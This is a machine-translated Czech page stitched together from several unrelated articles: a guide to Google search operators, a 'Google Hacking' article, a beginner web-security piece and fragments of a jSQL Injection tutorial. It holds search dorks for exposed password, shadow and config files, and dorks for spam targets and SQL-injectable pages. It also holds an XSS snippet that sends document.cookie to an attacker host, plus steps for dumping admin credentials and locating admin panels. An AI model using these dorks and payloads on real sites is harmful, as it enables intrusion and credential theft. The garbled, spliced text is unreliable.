• Návod k použití jSQL Injection, multifunkčního nástroje pro hledání a využívání SQL injection v Kali Linuxu. Návod k použití jSQL Injection - multifunkční nástroj pro vyhledávání a využívání SQL injection v Kali Linux Ka

    Jak správně vyhledávat pomocí google.com

    Každý asi umí používat vyhledávač jako je Google =) Ne každý ale ví, že pokud správně poskládáte vyhledávací dotaz pomocí speciálních konstrukcí, můžete mnohem efektivněji a rychleji dosáhnout výsledků toho, co hledáte =) V tomto článku Pokusím se to ukázat a co musíte udělat pro správné vyhledávání

    Google podporuje několik operátorů pokročilého vyhledávání, které mají zvláštní význam při vyhledávání na google.com. Tato prohlášení obvykle změní vyhledávání nebo dokonce Googlu říkají, aby prováděl zcela jiné typy vyhledávání. Například odkaz: konstrukt je speciální operátor a požadavek odkaz: www.google.com vám neumožní normální vyhledávání, ale místo toho najde všechny webové stránky, které mají odkazy na google.com.
    alternativní typy požadavků

    mezipaměť: Pokud do dotazu zahrnete další slova, Google tato slova zvýrazní v dokumentu uloženém v mezipaměti.
    Například, cache: www.webové stránky zobrazí obsah uložený v mezipaměti se zvýrazněným slovem „web“.

    odkaz: Výše ​​uvedený vyhledávací dotaz zobrazí webové stránky, které obsahují odkazy na zadaný dotaz.
    Například: odkaz: www.stránka zobrazí všechny stránky, které mají odkaz na http://www.site

    související: Zobrazí webové stránky, které „souvisejí“ se zadanou webovou stránkou.
    Například, související: www.google.com zobrazí seznam webových stránek, které jsou podobné domovské stránce Google.

    info: Request Information: zobrazí některé informace, které má Google o webové stránce, kterou požadujete.
    Například, info: webové stránky zobrazí informace o našem fóru =) (Armada - Fórum pro dospělé webmastery).

    Další žádosti o informace

    define: Dotaz define: poskytne definici slov, která za ním zadáte, shromážděných z různých online zdrojů. Definice bude pro celou zadanou frázi (to znamená, že bude zahrnovat všechna slova v přesném dotazu).

    akcie: Začnete-li dotaz s akciemi: Google zpracuje zbytek dotazů jako symboly akcií a odkáže na stránku s hotovými informacemi pro tyto symboly.
    Například, akcie: Intel yahoo zobrazí informace o Intel a Yahoo. (Všimněte si, že byste měli zadat symboly pro nejnovější zprávy, nikoli název společnosti)

    Modifikátory dotazů

    site: Pokud do svého dotazu zahrnete site:, omezí Google výsledky na ty webové stránky, které najde v dané doméně.
    Můžete také vyhledávat podle jednotlivých zón, jako je ru, org, com atd ( site:com site:ru)

    allintitle: Pokud spustíte dotaz s allintitle:, Google omezí výsledky na všechna slova dotazu v názvu.
    Například, allintitle: vyhledávání google vrátí všechny stránky Google vyhledáváním, jako jsou obrázky, blog atd

    intitle: Pokud ve svém dotazu zahrnete intitle:, Google omezí výsledky na dokumenty obsahující toto slovo v názvu.
    Například, intitle:Obchod

    allinurl: Pokud spustíte dotaz s allinurl: Google omezí výsledky na všechna slova dotazu v URL.
    Například, allinurl: vyhledávání google vrátí dokumenty pomocí google a vyhledá v názvu. Také můžete volitelně oddělit slova lomítkem (/), poté budou slova na obou stranách lomítka prohledána na stejné stránce: Příklad allinurl: foo/bar

    inurl: Pokud ve svém dotazu zahrnete inurl:, omezí Google výsledky na dokumenty obsahující toto slovo v adrese URL.
    Například, Animace inurl:site

    intext: prohledává pouze zadané slovo v textu stránky, ignoruje texty nadpisu a odkazů a další věci nesouvisející s. Existuje také odvozenina tohoto modifikátoru - allintext: tzn. dále budou všechna slova v dotazu vyhledána pouze v textu, což může být také důležité, ignoruje často používaná slova v odkazech
    Například, intext:forum

    daterange: hledá v časovém rámci (daterange:2452389-2452389), data pro časy jsou v juliánském formátu.

    No a všelijaké zajímavé příklady dotazů

    Příklady psaní dotazů pro Google. Pro spammery

    Inurl:control.guest?a=sign

    Site:books.dreambook.com „Adresa URL domovské stránky“ „Podepsat“ inurl:sign

    Web: www.freegb.net Domovská stránka

    Inurl:sign.asp „Počet postav“

    “Zpráva:” inurl:sign.cfm “Odesílatel:”

    Inurl:register.php “Registrace uživatele” “Webové stránky”

    Inurl:edu/guestbook „Zapište se do knihy návštěv“

    Inurl:post “Přidat komentář” “URL”

    Inurl:/archives/ “Komentáře:” “Pamatujete si informace?”

    “Skript a návštěvní kniha vytvořil:” “URL:” “Komentáře:”

    Inurl:?action=add “phpBook” “URL”

    Intitle: "Odeslat nový příběh"

    Časopisy

    Inurl:www.livejournal.com/users/mode=reply

    Inurl Největší žurnál.com/mode=reply

    Inurl:fastbb.ru/re.pl?

    Inurl:fastbb.ru /re.pl? "Kniha hostů"

    Blogy

    Inurl:blogger.com/comment.g?”postID””anonymní”

    Inurl:typepad.com/ “Přidejte komentář” “Pamatujete si osobní údaje?”

    Inurl:greatestjournal.com/community/ “Přidat komentář” “adresy anonymních plakátů”

    "Přidat komentář" "adresy anonymních plakátů" -

    Intitle: "Přidat komentář"

    Inurl:pirillo.com “Přidat komentář”

    Fóra

    Inurl:gate.html?”name=Forums” “mode=reply”

    Inurl:”forum/posting.php?mode=reply”

    Inurl:"mes.php?"

    Inurl:”members.html”

    Inurl:forum/memberlist.php?"

    Hackování s Googlem

    Alexandr Antipov

    Vyhledávač Google (www.google.com) poskytuje mnoho možností vyhledávání. Všechny tyto funkce jsou neocenitelným vyhledávacím nástrojem pro uživatele nového na internetu a zároveň ještě mocnější zbraní invaze a ničení v rukou lidí se zlými úmysly, mezi něž patří nejen hackeři, ale také nepočítačové zločince a dokonce i teroristé.
    (9475 zobrazení za 1 týden)


    Denis Barankov
    denisNOSPAMixi.ru

    Pozornost: Tento článek není návodem k akci. Tento článek byl napsán pro vás, správce WEB serveru, abyste ztratili falešný pocit, že jste v bezpečí, a konečně pochopíte záludnost tohoto způsobu získávání informací a chopíte se úkolu chránit svůj web.

    Úvod

    Například jsem našel 1670 stránek za 0,14 sekundy!

    2. Zadejte další řádek, například:

    inurl:"auth_user_file.txt"

    o něco méně, ale to už stačí pro bezplatné stažení a hádání hesla (pomocí stejného John The Ripper). Níže uvedu řadu dalších příkladů.

    Musíte si tedy uvědomit, že vyhledávač Google navštívil většinu internetových stránek a uložil informace na nich obsažené do mezipaměti. Tyto informace uložené v mezipaměti vám umožňují získat informace o webu a obsahu webu bez přímého připojení k webu, pouze ponořením se do informací uložených uvnitř Google. Navíc, pokud informace na webu již nejsou dostupné, mohou být informace v mezipaměti stále zachovány. Vše, co k této metodě potřebujete, je znát některá klíčová slova Google. Tato technika se nazývá Google Hacking.

    Informace o Google Hacking se poprvé objevily na mailing listu Bugtruck před 3 lety. V roce 2001 toto téma nastolil francouzský student. Zde je odkaz na tento dopis http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Poskytuje první příklady takových dotazů:

    1) Index /admin
    2) Index /hesla
    3) Index /mail
    4) Index / +banques +filetype:xls (pro Francii...)
    5) Index / +passwd
    6) Index souboru / password.txt

    Toto téma vyvolalo vlny v anglické části internetu poměrně nedávno: po článku Johnnyho Longa, publikovaném 7. května 2004. Pro úplnější studium Google Hacking vám doporučuji přejít na web tohoto autora http://johnny.ihackstuff.com. V tomto článku vás chci jen informovat.

    Kdo to může použít:
    - Novináři, špióni a všichni lidé, kteří rádi strkají nos do cizích věcí, toho mohou využít k hledání usvědčujících důkazů.
    - Hackeři hledající vhodné cíle pro hackování.

    Jak Google funguje.

    Chcete-li pokračovat v konverzaci, dovolte mi připomenout některá klíčová slova používaná v dotazech Google.

    Hledejte pomocí znaménka +

    Google z vyhledávání vylučuje slova, která považuje za nedůležitá. Například dotazovací slova, předložky a články v angličtině: například are, of, where. Zdá se, že v ruštině Google považuje všechna slova za důležitá. Pokud je nějaké slovo z vyhledávání vyloučeno, Google o něm píše. Aby Google mohl začít vyhledávat stránky s těmito slovy, musíte před slovo přidat znaménko + bez mezery. Například:

    eso + základny

    Hledejte pomocí znaku –

    Pokud Google najde velké množství stránek, ze kterých potřebuje vyloučit stránky s určitým tématem, můžete Google donutit, aby hledal pouze stránky, které neobsahují určitá slova. Chcete-li to provést, musíte tato slova označit umístěním znaku před každé - bez mezery před slovem. Například:

    rybaření - vodka

    Hledejte pomocí ~

    Možná budete chtít hledat nejen zadané slovo, ale také jeho synonyma. Chcete-li to provést, uveďte před slovo symbol ~.

    Nalezení přesné fráze pomocí dvojitých uvozovek

    Google vyhledává na každé stránce všechny výskyty slov, která jste napsali do řetězce dotazu, a nezajímá se o relativní pozici slov, pokud jsou všechna zadaná slova na stránce ve stejnou dobu (toto je výchozí akce). Chcete-li najít přesnou frázi, musíte ji dát do uvozovek. Například:

    "knižní zarážka"

    Chcete-li mít alespoň jedno ze zadaných slov, musíte explicitně zadat logickou operaci: NEBO. Například:

    bezpečnost knihy NEBO ochrana

    Kromě toho můžete použít znak * ve vyhledávací liště k označení libovolného slova a. reprezentovat jakoukoli postavu.

    Hledání slov pomocí dalších operátorů

    Existují vyhledávací operátory, které jsou uvedeny ve vyhledávacím řetězci ve formátu:

    operátor:hledaný_term

    Mezery vedle dvojtečky nejsou potřeba. Pokud za dvojtečku vložíte mezeru, zobrazí se chybová zpráva a před ní je Google použije jako běžný vyhledávací řetězec.
    Existují skupiny dalších operátorů vyhledávání: jazyky - uveďte, v jakém jazyce chcete vidět výsledek, datum - omezte výsledky za poslední tři, šest nebo 12 měsíců, výskyty - uveďte, kde v dokumentu je třeba hledat řádek: všude, v názvu, v adrese URL, doménách - hledat na zadaném webu nebo jej naopak z vyhledávání vyřadit, bezpečné vyhledávání - blokuje weby obsahující zadaný typ informací a odstraňuje je ze stránek s výsledky vyhledávání.
    Některé operátory přitom další parametr nevyžadují, například požadavek „cache:www.google.com“ lze volat jako plnohodnotný vyhledávací řetězec a některá klíčová slova naopak vyhledávání vyžadují slovo, například „site:www. google.com help “. Ve světle našeho tématu se podívejme na následující operátory:

    Operátor

    Popis

    Vyžaduje další parametr?

    hledat pouze na webu zadaném v search_term

    hledat pouze v dokumentech typu search_term

    najít stránky obsahující hledaný výraz v názvu

    najít stránky obsahující všechna hledaná slova v názvu

    najít stránky obsahující ve své adrese slovo search_term

    najít stránky obsahující všechna slova hledaný výraz v jejich adrese

    Operátor site: omezuje vyhledávání pouze na zadaný web a můžete zadat nejen název domény, ale také IP adresu. Zadejte například:

    Operátor filetype: Omezuje vyhledávání na konkrétní typ souboru. Například:

    K datu publikace článku může Google vyhledávat ve 13 různých formátech souborů:

    • Adobe Portable Document Format (pdf)
    • Adobe PostScript (ps)
    • Lotus 1-2-3 (týden 1, týden 2, týden 3, týden 4, týden 5, týden, týden, týden)
    • Lotus WordPro (lwp)
    • MacWrite (mw)
    • Microsoft Excel (xls)
    • Microsoft PowerPoint (ppt)
    • Microsoft Word (doc)
    • Microsoft Works (wks, wps, wdb)
    • Microsoft Write (wri)
    • Formát RTF (rtf)
    • Shockwave Flash (swf)
    • Text (ans, txt)

    Operátor odkazu: Zobrazí všechny stránky, které ukazují na zadanou stránku.
    Pravděpodobně je vždy zajímavé sledovat, kolik míst na internetu o vás ví. Zkusme to:

    Operátor mezipaměti: Zobrazuje verzi webu v mezipaměti Google tak, jak vypadala, když Google tuto stránku naposledy navštívil. Vezměme si jakýkoli často se měnící web a podívejme se:

    Operátor intitle: Vyhledá zadané slovo v titulku stránky. Operátor allintitle: je rozšíření - hledá všechna zadaná víceslovná slova v názvu stránky. Porovnat:

    intitle:let na Mars
    intitle:flight intitle:on intitle:mars
    allintitle:let na mars

    Operátor inurl: způsobí, že Google zobrazí všechny stránky obsahující zadaný řetězec v adrese URL. Operátor allinurl: hledá všechna slova v URL. Například:

    allinurl:acid acid_stat_alerts.php

    Tento příkaz je užitečný zejména pro ty, kteří nemají SNORT – alespoň vidí, jak to funguje na reálném systému.

    Metody hackování pomocí Google

    Zjistili jsme tedy, že pomocí kombinace výše uvedených operátorů a klíčových slov může kdokoli shromáždit potřebné informace a vyhledat zranitelnosti. Tyto techniky se často nazývají Google Hacking.

    Mapa stránek

    Pomocí operátoru site: můžete vypsat všechny odkazy, které Google na webu našel. Stránky, které jsou dynamicky vytvářeny skripty, se obvykle neindexují pomocí parametrů, takže některé weby používají filtry ISAPI, takže odkazy nejsou ve tvaru /article.asp?num=10&dst=5 , ale s lomítky /article/abc/num/ 10/ dst/5. To se děje tak, že web je obecně indexován vyhledávači.

    Zkusme to:

    stránky: www.whitehouse.gov whitehouse

    Google si myslí, že každá stránka na webu obsahuje slovo whitehouse. To je to, co používáme k získání všech stránek.
    Existuje také zjednodušená verze:

    web: whitehouse.gov

    A nejlepší na tom je, že soudruzi z whitehouse.gov ani nevěděli, že jsme se podívali na strukturu jejich webu a dokonce se podívali na stránky uložené v mezipaměti, které Google stáhl. Toho lze využít ke studiu struktury webů a zobrazení obsahu, který zatím zůstává nezjištěn.

    Zobrazení seznamu souborů v adresářích

    WEB servery mohou místo běžných HTML stránek zobrazovat seznamy adresářů serverů. To se obvykle provádí, aby se zajistilo, že uživatelé vybírají a stahují konkrétní soubory. V mnoha případech však správci nemají v úmyslu zobrazovat obsah adresáře. K tomu dochází v důsledku nesprávné konfigurace serveru nebo absence hlavní stránky v adresáři. Díky tomu má hacker šanci najít v adresáři něco zajímavého a použít to pro své účely. K nalezení všech takových stránek stačí poznamenat, že všechny obsahují slova: index of. Protože ale index slov neobsahuje pouze takové stránky, musíme dotaz upřesnit a vzít v úvahu klíčová slova na samotné stránce, takže dotazy jako:

    intitle:index.nadřazeného adresáře
    intitle:index.of name size

    Vzhledem k tomu, že většina výpisů v adresáři je záměrná, můžete mít napoprvé potíže najít nesprávně umístěné výpisy. Ale alespoň již můžete použít výpisy k určení verze WEB serveru, jak je popsáno níže.

    Získání verze WEB serveru.

    Znalost verze WEB serveru je vždy užitečná před zahájením jakéhokoli hackerského útoku. Opět díky Googlu můžete tyto informace získat bez připojení k serveru. Když se podíváte pozorně na výpis adresáře, uvidíte, že je tam zobrazen název WEB serveru a jeho verze.

    Apache1.3.29 – ProXad Server na trf296.free.fr Port 80

    Zkušený správce může tyto informace změnit, ale zpravidla je to pravda. K získání těchto informací tedy stačí odeslat žádost:

    intitle:index.of serveru.at

    Abychom získali informace pro konkrétní server, objasníme požadavek:

    intitle:index.of server.at site:ibm.com

    Nebo naopak, hledáme servery se specifickou verzí serveru:

    intitle:index.of Apache/2.0.40 Server at

    Tuto techniku ​​může hacker použít k nalezení oběti. Pokud má například exploit pro určitou verzi WEB serveru, může jej najít a vyzkoušet stávající exploit.

    Verzi serveru můžete také získat zobrazením stránek, které jsou standardně nainstalovány při instalaci nejnovější verze WEB serveru. Chcete-li například zobrazit testovací stránku Apache 1.2.6, stačí napsat

    intitle:Test.stránky.pro.Apache to.fungovalo!

    Některé operační systémy navíc okamžitě nainstalují a spustí WEB server během instalace. Někteří uživatelé si to však ani neuvědomují. Přirozeně, pokud vidíte, že někdo neodstranil výchozí stránku, je logické předpokládat, že počítač neprošel vůbec žádnou úpravou a je pravděpodobně zranitelný vůči útoku.

    Zkuste vyhledat stránky IIS 5.0

    allintitle:Vítejte ve Windows 2000 Internet Services

    V případě IIS můžete určit nejen verzi serveru, ale také verzi systému Windows a aktualizaci Service Pack.

    Dalším způsobem, jak zjistit verzi WEB serveru, je vyhledat manuály (stránky nápovědy) a příklady, které mohou být standardně nainstalovány na webu. Hackeři našli poměrně dost způsobů, jak tyto komponenty využít k získání privilegovaného přístupu k webu. To je důvod, proč musíte tyto součásti odstranit na místě výroby. Nemluvě o tom, že přítomnost těchto komponent lze využít k získání informací o typu serveru a jeho verzi. Najdeme například příručku Apache:

    inurl:manuální moduly direktiv Apache

    Použití Google jako CGI skeneru.

    CGI skener nebo WEB skener je nástroj pro vyhledávání zranitelných skriptů a programů na serveru oběti. Tyto nástroje musí vědět, co mají hledat, k tomu mají celý seznam zranitelných souborů, například:

    /cgi-bin/cgiemail/uargg.txt
    /random_banner/index.cgi
    /random_banner/index.cgi
    /cgi-bin/mailview.cgi
    /cgi-bin/maillist.cgi
    /cgi-bin/userreg.cgi

    /iissamples/ISSamples/SQLQHit.asp
    /SiteServer/admin/findvserver.asp
    /scripts/cphost.dll
    /cgi-bin/finger.cgi

    Každý z těchto souborů můžeme najít pomocí Google, navíc pomocí slov index of nebo inurl s názvem souboru ve vyhledávací liště: můžeme najít stránky se zranitelnými skripty, například:

    allinurl:/random_banner/index.cgi

    Pomocí dalších znalostí může hacker zneužít zranitelnost skriptu a použít tuto zranitelnost k tomu, aby skript přinutil odeslat jakýkoli soubor uložený na serveru. Například soubor s hesly.

    Jak se chránit před hackováním Google. 1. Neuvádějte důležitá data na WEB server.

    I když jste data zveřejnili dočasně, můžete na ně zapomenout nebo někdo bude mít čas tato data najít a vzít, než je vymažete. Nedělej to. Existuje mnoho dalších způsobů přenosu dat, které je chrání před krádeží.

    2. Zkontrolujte svůj web.

    Použijte popsané metody k průzkumu vašeho webu. Pravidelně na svém webu kontrolujte nové metody, které se objevují na webu http://johnny.ihackstuff.com. Pamatujte, že pokud chcete své akce automatizovat, musíte získat zvláštní povolení od společnosti Google. Pokud čtete pozorně http://www.google.com/terms_of_service.html, pak se zobrazí fráze: Bez předchozího výslovného souhlasu společnosti Google nesmíte do systému Google odesílat automatizované dotazy jakéhokoli druhu.

    3. Možná nebudete potřebovat Google k indexování vašeho webu nebo jeho části.

    Google vám umožňuje odstranit odkaz na váš web nebo jeho část z jeho databáze a také odstranit stránky z mezipaměti. Kromě toho můžete na svém webu zakázat vyhledávání obrázků, zakázat zobrazování krátkých částí stránek ve výsledcích vyhledávání. Všechny možnosti smazání webu jsou popsány na stránce http://www.google.com/remove.html. K tomu musíte potvrdit, že jste skutečně vlastníkem tohoto webu nebo do stránky vložit tagy resp

    4. Použijte soubor robots.txt

    Je známo, že vyhledávače se dívají na soubor robots.txt umístěný v kořenovém adresáři webu a neindexují ty části, které jsou označeny slovem Disallow. Pomocí toho můžete zabránit indexování části webu. Chcete-li například zabránit indexování celého webu, vytvořte soubor robots.txt obsahující dva řádky:

    User-agent: *
    Disallow: /

    Co se ještě stane

    Aby se vám život nezdál jako med, řeknu nakonec, že ​​existují stránky, které sledují ty lidi, kteří pomocí výše uvedených metod hledají díry ve skriptech a WEB serverech. Příkladem takové stránky je

    Aplikace.

    Trochu sladké. Vyzkoušejte sami některé z následujících:

    1. #mysql dump filetype:sql – vyhledá výpisy mySQL databáze
    2. Souhrnná zpráva o zranitelnosti hostitele – ukáže vám, jaké zranitelnosti našli ostatní lidé
    3. phpMyAdmin běžící na inurl:main.php – toto vynutí uzavření ovládání přes panel phpmyadmin
    4. není pro distribuci důvěrné
    5. Podrobnosti požadavku na proměnné serveru řídicího stromu
    6. Běh v dětském režimu
    7. Tuto zprávu vytvořil WebLog
    8. intitle:index.of cgiirc.config
    9. filetype:conf inurl:firewall -intitle:cvs – možná někdo potřebuje konfigurační soubory firewallu? :)
    10. intitle:index.of finance.xls – hmm....
    11. intitle:Index chatů dbconvert.exe – icq chat logs
    12.intext:Tobias Oetiker dopravní analýza
    13. intitle:Statistiky použití pro Generated by Webalizer
    14. intitle:statistika pokročilé webové statistiky
    15. intitle:index.of ws_ftp.ini – konfigurace ws ftp
    16. inurl:ipsec.secrets uchovává sdílená tajemství - tajný klíč - dobrý nález
    17. inurl:main.php Vítejte v phpMyAdmin
    18. inurl:server-info Informace o serveru Apache
    19. site:edu admin známky
    20. ORA-00921: neočekávaný konec SQL příkazu – získávání cest
    21. intitle:index.of trillian.ini
    22. intitle:Index of pwd.db
    23.intitle:index.of people.lst
    24. intitle:index.of master.passwd
    25.inurl:passlist.txt
    26. intitle:Index of .mysql_history
    27. intitle:index of intext:globals.inc
    28. intitle:index.správců.pwd
    29. intitle:Index.of etc stínu
    30.intitle:index.ofsecring.pgp
    31. inurl:config.php název_dbu dbpass
    32. inurl:provést typ souboru:ini

  • "Hacking mit Google"
  • Školicí středisko "Informzashita" http://www.itsecurity.ru - přední specializované středisko v oblasti školení v oblasti informační bezpečnosti (Licence Moskevského výboru pro vzdělávání č. 015470, státní akreditace č. 004251). Jediné autorizované školicí středisko pro internetové bezpečnostní systémy a Clearswift v Rusku a zemích SNS. Autorizované školicí středisko společnosti Microsoft (specializace zabezpečení). Školicí programy jsou koordinovány se Státní technickou komisí Ruska, FSB (FAPSI). Certifikáty o školení a státní doklady o dalším školení.

    SoftKey je jedinečná služba pro kupující, vývojáře, prodejce a affiliate partnery. Kromě toho se jedná o jeden z nejlepších online obchodů se softwarem v Rusku, na Ukrajině, v Kazachstánu, který zákazníkům nabízí širokou škálu produktů, mnoho platebních metod, rychlé (často okamžité) vyřízení objednávky, sledování průběhu objednávky v osobní sekci, různé slevy od obchodu a výrobců BY.

    Rozhodl jsem se mluvit trochu o bezpečnosti informací. Článek bude užitečný pro začínající programátory a ty, kteří se právě začali zabývat vývojem Frontendu. Co je za problém?

    Mnoho začínajících vývojářů se tak nechá unést psaním kódu, že úplně zapomene na bezpečnost své práce. A hlavně zapomínají na takové zranitelnosti, jako jsou SQL a XXS dotazy. Také přicházejí se snadnými hesly pro své administrativní panely a jsou vystaveni hrubé síle. Jaké jsou tyto útoky a jak se jim můžete vyhnout?

    SQL injekce

    SQL injection je nejběžnějším typem útoku na databázi, který se provádí během SQL dotazu pro konkrétní DBMS. Takovými útoky trpí mnoho lidí a dokonce i velké společnosti. Důvodem je chyba vývojáře při zápisu databáze a přísně vzato SQL dotazy.

    Útok SQL injection je možný kvůli nesprávnému zpracování vstupních dat používaných v dotazech SQL. Pokud je útok hackera úspěšný, riskujete ztrátu nejen obsahu databází, ale také hesel a protokolů administrativního panelu. A tato data budou stačit k úplnému převzetí webu nebo jeho nevratným úpravám.

    Útok lze úspěšně reprodukovat ve skriptech napsaných v PHP, ASP, Perlu a dalších jazycích. Úspěch takových útoků závisí spíše na tom, jaké DBMS se používá a jak je implementován samotný skript. Na světě existuje mnoho zranitelných stránek pro injekce SQL. To lze snadno ověřit. Stačí zadat „dorks“ – to jsou speciální dotazy pro vyhledávání zranitelných stránek. Tady jsou některé z nich:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Jak je používat? Stačí je zadat do vyhledávače Google nebo Yandex. Vyhledávač vám poskytne nejen zranitelnou stránku, ale také stránku o této zranitelnosti. Tím se ale nezastavíme a ujistíme se, že stránka je skutečně zranitelná. K tomu stačí vložit za hodnotu „id=1“ jednu uvozovku „“. Něco takového:

    • inurl:games.php?id=1'

    A web nám vypíše chybu o SQL dotazu. Co náš hacker potřebuje dál?

    A pak potřebuje právě tento odkaz na chybovou stránku. Poté práce na zranitelnosti ve většině případů probíhají v distribuci „Kali linux“ s jejími utilitami pro tuto část: zavedení injekčního kódu a provedení nezbytných operací. Jak se to stane, to vám nedokážu říct. Informace o tom ale najdete na internetu.

    XSS útok

    Tento typ útoku se provádí na soubory cookie. Uživatelé je zase rádi šetří. Proč ne? Co bychom bez nich dělali? Koneckonců, díky souborům cookie nemusíme stokrát zadávat heslo pro Vk.com nebo Mail.ru. A je málo těch, kteří je odmítají. Na internetu se ale pro hackery často objevuje pravidlo: koeficient pohodlí je přímo úměrný koeficientu nejistoty.

    K implementaci XSS útoku potřebuje náš hacker znalost JavaScriptu. Jazyk je na první pohled velmi jednoduchý a neškodný, protože nemá přístup k počítačovým zdrojům. Hacker může pracovat pouze s JavaScriptem v prohlížeči, ale to stačí. Koneckonců, hlavní věcí je zadat kód do webové stránky.

    Nebudu podrobně mluvit o procesu útoku. Řeknu vám jen základy a význam toho, jak se to děje.

    Hacker může přidat JS kód do nějakého fóra nebo návštěvní knihy:

    document.location.href =”http://192.168.1.7/sniff.php?test”

    Skripty nás přesměrují na infikovanou stránku, kde se spustí kód: ať už je to sniffer, nějaký druh úložiště nebo exploit, který nějakým způsobem ukradne naše cookies z mezipaměti.

    Proč JavaScript? Protože JavaScript je skvělý ve zpracování webových požadavků a má přístup k souborům cookie. Pokud nás ale náš skript zavede na nějaký web, uživatel si toho snadno všimne. Zde hacker využívá mazanější možnost – jednoduše zadá kód do obrázku.

    Img=nový obrázek();

    Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

    Jednoduše vytvoříme obrázek a přiřadíme mu náš skript jako adresu.

    Jak se před tím vším chránit? Je to velmi jednoduché – neklikejte na podezřelé odkazy.

    DoS a DDos útoky

    DoS (z anglického Denial of Service - denial of service) je hackerský útok na počítačový systém s cílem způsobit jeho selhání. Jedná se o vytváření podmínek, za kterých bona fide uživatelé systému nemají přístup k poskytovaným systémovým prostředkům (serverům), nebo je tento přístup obtížný. Selhání systému může být také krokem k jeho převzetí, pokud v nouzové situaci software vytvoří kritické informace: například verzi, část programového kódu atd. Nejčastěji se však jedná o měřítko ekonomického tlaku: ztráta jednoduché služby, která generuje příjem. Účty od poskytovatele nebo opatření k zamezení útoku výrazně zasáhly „cíl“ v kapse.V současné době jsou nejoblíbenější DoS a DDoS útoky, které umožňují selhání téměř jakéhokoli systému bez zanechání právně významných důkazů.

    Jaký je rozdíl mezi útokem DoS a DDos?

    DoS je útok navržený chytrým způsobem. Pokud například server nezkontroluje správnost příchozích paketů, může hacker podat požadavek, jehož zpracování bude trvat věčnost, a na práci s jinými připojeními nebude dostatek času procesoru. V souladu s tím bude klientům služba odepřena. Ale nebude možné tímto způsobem přetěžovat nebo deaktivovat velké známé stránky. Jsou vyzbrojeni poměrně širokými kanály a supervýkonnými servery, které se s takovým přetížením bez problémů vypořádají.

    DDoS je vlastně stejný útok jako DoS. Ale pokud v DoS existuje jeden paket požadavku, pak v DDoS jich mohou být stovky nebo více. Dokonce ani supervýkonné servery nemusí být schopné takové přetížení zvládnout. Dovolte mi uvést příklad.

    DoS útok je, když s někým konverzujete, ale pak přijde nějaký nevychovaný člověk a začne hlasitě křičet. Mluvit je buď nemožné, nebo velmi obtížné. Řešení: zavolejte ostrahu, která uklidní a vyvede osobu z areálu. DDoS útoky jsou, když se dovnitř nahrne dav tisíců takových nevychovaných lidí. Ochranka v tomto případě nebude moci všechny svázat a odvézt.

    DoS a DDoS se provádějí z počítačů, tzv. zombie. Jedná se o počítače uživatelů hacknutých hackery, kteří ani netuší, že se jejich stroj účastní útoku na jakýkoli server.

    Jak se před tím chránit? Obecně v žádném případě. Hackerovi ale můžete věci ztížit. Chcete-li to provést, musíte si vybrat dobrý hosting s výkonnými servery.

    Bruteforce útok

    Vývojář může přijít se spoustou systémů ochrany před útoky, plně zkontrolovat skripty, které jsme napsali, zkontrolovat, zda web neobsahuje zranitelnost atd. Když se ale dostane k poslednímu kroku vzhledu webu, totiž když si jednoduše nastaví heslo pro admin panel, může na jednu věc zapomenout. Heslo!

    Přísně se nedoporučuje nastavovat jednoduché heslo. Může to být 12345, 1114457, vasya111 atd. Nedoporučuje se nastavovat hesla kratší než 10-11 znaků. V opačném případě můžete být vystaveni nejběžnějšímu a nekomplikovanému útoku – Brute force.

    Brute force je slovníkový útok na vyhledávání hesel pomocí speciálních programů. Slovníky mohou být různé: latinské, výčty podle čísel, řekněme do určitého rozsahu, smíšené (latina + čísla) a existují i ​​slovníky s jedinečnými znaky @#4$%&*~~`’”\ ? atd.

    Tomuto typu útoku se lze samozřejmě snadno vyhnout, stačí si vymyslet složité heslo. I captcha vás může zachránit. Také, pokud je váš web vytvořen na CMS, pak mnoho z nich detekuje tento typ útoku a zablokuje IP. Vždy si musíte pamatovat, že čím více různých znaků v hesle, tím těžší je uhodnout.

    Jak hackeři fungují? Ve většině případů buď podezřívají, nebo znají část hesla předem. Je celkem logické předpokládat, že heslo uživatele určitě nebude mít 3 nebo 5 znaků. Taková hesla vedou k častému hackování. V zásadě hackeři berou rozsah 5 až 10 znaků a přidávají několik znaků, které mohou znát předem. Dále se vygenerují hesla s požadovanými rozsahy. Distribuce Kali Linux má dokonce programy pro takové případy. A voilá, útok už nebude trvat dlouho, protože objem slovníku už není tak velký. Kromě toho může hacker využít sílu grafické karty. Některé z nich podporují systém CUDA a rychlost vyhledávání se zvyšuje až 10krát. A teď vidíme, že útok takto jednoduchým způsobem je docela reálný. Ale nejsou to jen webové stránky, které jsou vystaveny hrubé síle.

    Vážení vývojáři, nikdy nezapomínejte na systém informační bezpečnosti, protože dnes mnoho lidí, včetně států, trpí podobnými typy útoků. Největší zranitelnost je totiž člověk, který se vždy může někde rozptýlit nebo něco přehlédnout. Jsme programátoři, ale ne naprogramované stroje. Buďte vždy ve střehu, protože ztráta informací může mít vážné následky!

    Spusťte stažený soubor dvojitým kliknutím (musíte mít virtuální stroj).

    3. Anonymita při kontrole místa pro SQL injection
    Nastavení Tor a Privoxy v Kali Linuxu

    [Sekce ve vývoji]

    Nastavení Tor a Privoxy ve Windows

    [Sekce ve vývoji]

    Nastavení proxy v jSQL Injection

    [Sekce ve vývoji]

    4. Kontrola místa pro SQL injection pomocí jSQL Injection

    Práce s programem je velmi jednoduchá. Stačí zadat adresu webu a stisknout ENTER.

    Následující snímek obrazovky ukazuje, že web je zranitelný vůči třem typům injekcí SQL (informace o nich jsou uvedeny v pravém dolním rohu). Kliknutím na názvy injekcí můžete přepnout použitou metodu:

    Také se nám již zobrazily stávající databáze.

    Obsah každé tabulky si můžete prohlédnout:

    Nejzajímavější věcí na tabulkách jsou obvykle přihlašovací údaje správce.

    Pokud budete mít štěstí a data administrátora najdete, pak je ještě brzy na radost. Ještě musíte najít admin panel, kam tyto údaje zadat.

    5. Hledejte admin panely pomocí jSQL Injection

    Chcete-li to provést, přejděte na další kartu. Zde nás přivítá seznam možných adres. Pro kontrolu můžete vybrat jednu nebo více stránek:

    Pohodlí spočívá v tom, že nemusíte používat další programy.

